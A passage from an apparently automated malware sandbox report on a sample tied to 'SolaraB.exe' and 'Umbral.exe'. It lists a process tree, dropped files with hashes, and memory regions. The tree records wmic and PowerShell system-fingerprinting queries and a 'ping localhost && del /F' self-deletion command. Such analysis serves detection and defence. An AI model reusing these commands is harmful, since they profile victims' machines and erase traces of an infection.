                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1160
                                          • C:\Windows\System32\Wbem\wmic.exe
                                            "wmic.exe" os get Caption
                                            3⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1780
                                          • C:\Windows\System32\Wbem\wmic.exe
                                            "wmic.exe" computersystem get totalphysicalmemory
                                            3⤵
                                              PID:2060
                                            • C:\Windows\System32\Wbem\wmic.exe
                                              "wmic.exe" csproduct get uuid
                                              3⤵
                                                PID:2556
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                3⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1876
                                              • C:\Windows\System32\Wbem\wmic.exe
                                                "wmic" path win32_VideoController get name
                                                3⤵
                                                • Detects videocard installed
                                                PID:2132
                                              • C:\Windows\system32\cmd.exe
                                                "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
                                                3⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:2020
                                                • C:\Windows\system32\PING.EXE
                                                  ping localhost
                                                  4⤵
                                                  • Runs ping.exe
                                                  PID:1104
                                          • C:\Windows\system32\wbem\WmiApSrv.exe
                                            C:\Windows\system32\wbem\WmiApSrv.exe
                                            1⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2508

                                          Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Local\Temp\SolaraB.exe

                                            Filesize

                                            434KB

                                            MD5

                                            6787e0a40d568fa795d5f161b6643319

                                            SHA1

                                            f2a25997405ae299f1f0b79a14b428576c2222cb

                                            SHA256

                                            c48fdb6d13f7a2a778a646aaaf2cba2ddf9f2cf523ff1f700185213057116ee6

                                            SHA512

                                            66eaa3d8b524e3cb9d3f3d40034f8321f24c1b5ed77e8039f5682116776edfd59519f2aefa7cb8b35e5939dfaf744197abf0c0a85067ac98ff6cb4d289e38a91

                                          • C:\Users\Admin\AppData\Local\Temp\Umbral.exe

                                            Filesize

                                            231KB

                                            MD5

                                            dc8cfe903cd39191e93c5003568f75e9

                                            SHA1

                                            8406d466aba0fa4dcd59ae3059d8dc393e77e25d

                                            SHA256

                                            4068e0955554c872492cb955ae63e983a57db97c43966af5e73feb5618c44486

                                            SHA512

                                            a55117aa65c1bb4a5230da4aa4661e99a1c80163938230d752c3442173c90f6e5f2abd630fc8b09b9f14eb75da9f355c19f3bd37845fa8efc0f625b2b1506407

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                            Filesize

                                            7KB

                                            MD5

                                            d52cd817264e1d030e853088e40be38c

                                            SHA1

                                            52b92534439bf671109b035832293868981050d4

                                            SHA256

                                            362957213c466d66e1d73b4d876d2bbc37086488e3da625ddf2b5b35ee4d18bf

                                            SHA512

                                            29206012489c7145d737b2b6d52d005d6e9beb3897f7503a1aadb84d3ee382c19275bc1086ad133ccd0552faadf70ff51b24ab23b0126a2949543afe26d05e80

                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\y5nxxdhf.5gc.exe

                                            Filesize

                                            114KB

                                            MD5

                                            d91fb6867df7e4303d98b5e90faae73c

                                            SHA1

                                            496f53ad8cd9381f1c1b577a73e978081002c1db

                                            SHA256

                                            bb19b002df31e1196b4e6530cf54c449e9cf1383d3adc5334a0442fa96b36344

                                            SHA512

                                            5dbcfe9bf567c6f1e18027950726af1835ab8b363ba8b040fd379b4cfe94b0894bc969b3c04fa4f1964b441a7b894bd4d37f3aabe3ea31396687a6ca093cfdc9

                                          • C:\Windows\xdwd.dll

                                            Filesize

                                            136KB

                                            MD5

                                            16e5a492c9c6ae34c59683be9c51fa31

                                            SHA1

                                            97031b41f5c56f371c28ae0d62a2df7d585adaba

                                            SHA256

                                            35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

                                            SHA512

                                            20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

                                          • memory/408-542-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/708-176-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/784-322-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/876-906-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1052-266-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1076-687-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1104-288-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1128-821-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1204-485-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1204-737-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1240-822-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1256-681-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1296-289-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1308-766-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1472-519-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1484-765-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1520-849-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1560-207-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1596-151-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1612-349-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1612-597-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1636-793-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1684-428-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1712-575-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1776-878-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1792-210-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1812-321-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1896-961-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1896-429-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1952-1-0x0000000001300000-0x0000000001356000-memory.dmp

                                            Filesize

                                            344KB

                                          • memory/1952-0-0x000007FEF59D3000-0x000007FEF59D4000-memory.dmp

                                            Filesize

                                            4KB

                                          • memory/1952-14-0x000007FEF59D0000-0x000007FEF63BC000-memory.dmp

                                            Filesize

                                            9.9MB

                                          • memory/1956-98-0x000007FEF29F0000-0x000007FEF2A12000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/1996-654-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2060-513-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2080-709-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2144-177-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2184-630-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2208-462-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2240-574-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2244-598-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2264-97-0x000007FEF29F0000-0x000007FEF2A12000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2272-232-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2276-743-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2304-850-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2312-877-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2324-15-0x000007FEF59D0000-0x000007FEF63BC000-memory.dmp

                                            Filesize

                                            9.9MB

                                          • memory/2324-1027-0x0000000000A90000-0x0000000000A9C000-memory.dmp

                                            Filesize

                                            48KB

                                          • memory/2324-13-0x0000000000F50000-0x0000000000FC2000-memory.dmp

                                            Filesize

                                            456KB

                                          • memory/2324-100-0x0000000000A70000-0x0000000000A7C000-memory.dmp

                                            Filesize

                                            48KB

                                          • memory/2324-157-0x000007FEF59D0000-0x000007FEF63BC000-memory.dmp

                                            Filesize

                                            9.9MB

                                          • memory/2432-933-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2440-405-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2448-350-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2464-541-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2508-99-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2524-260-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2652-934-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2656-20-0x000000001B610000-0x000000001B8F2000-memory.dmp

                                            Filesize

                                            2.9MB

                                          • memory/2656-21-0x0000000001F70000-0x0000000001F78000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/2700-406-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2736-373-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2744-372-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2776-461-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2780-710-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2784-42-0x000000001B690000-0x000000001B972000-memory.dmp

                                            Filesize

                                            2.9MB

                                          • memory/2784-43-0x0000000002860000-0x0000000002868000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/2800-653-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2824-486-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2832-799-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2872-125-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2928-122-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2928-631-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2956-150-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2960-905-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/2988-12-0x0000000000D50000-0x0000000000D90000-memory.dmp

                                            Filesize

                                            256KB

                                          • memory/2992-27-0x000000001B750000-0x000000001BA32000-memory.dmp

                                            Filesize

                                            2.9MB

                                          • memory/2992-28-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

                                            Filesize

                                            32KB

                                          • memory/3036-233-0x000007FEF2560000-0x000007FEF2582000-memory.dmp

                                            Filesize

                                            136KB

                                          • memory/3056-1038-0x0000000001100000-0x0000000001122000-memory.dmp

                                            Filesize

                                            136KB